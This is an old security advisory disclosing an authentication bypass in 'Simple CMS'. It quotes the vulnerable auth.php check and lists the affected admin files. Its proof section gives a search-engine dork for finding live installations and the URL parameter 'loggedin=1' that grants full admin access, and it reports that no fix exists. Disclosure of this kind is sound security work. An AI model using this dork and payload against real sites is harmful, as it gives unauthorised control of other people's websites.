Simple CMS Administrator Authentication Bypass Vulnerability

2006-08-07 00:00:00

Simple CMS <[email protected]>

Information:
The cms from http://www.cms-center.com/ uses no security at all, just a boolean
"isloggedin". If you submit "loggedin=1" in the URL of any of the admin pages,
you get full controll.

Vulnerable code:
<auth.php>
if ($loggedin != "1"){
header("Location: /login.php?e=1"); /* Redirect browser */
/* Make sure that code below does not get executed when we redirect. */
exit;
}
//echo "ok";

Vulnerable files:
/admin/item_modify.php
/admin/item_list.php
/admin/item_legend.php
/admin/item_detail.php
/admin/index.php
/admin/config_pages.php
/admin/add_item1.php

Proof:
1. Google for "powered by php mysql simple cms"
2. type "admin/config_pages.php?loggedin=1" behind the url
3. Done. It works on every admin page that uses the so called auth.php.

I tried to contact the author, but i was unable to find ANY contact info.

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.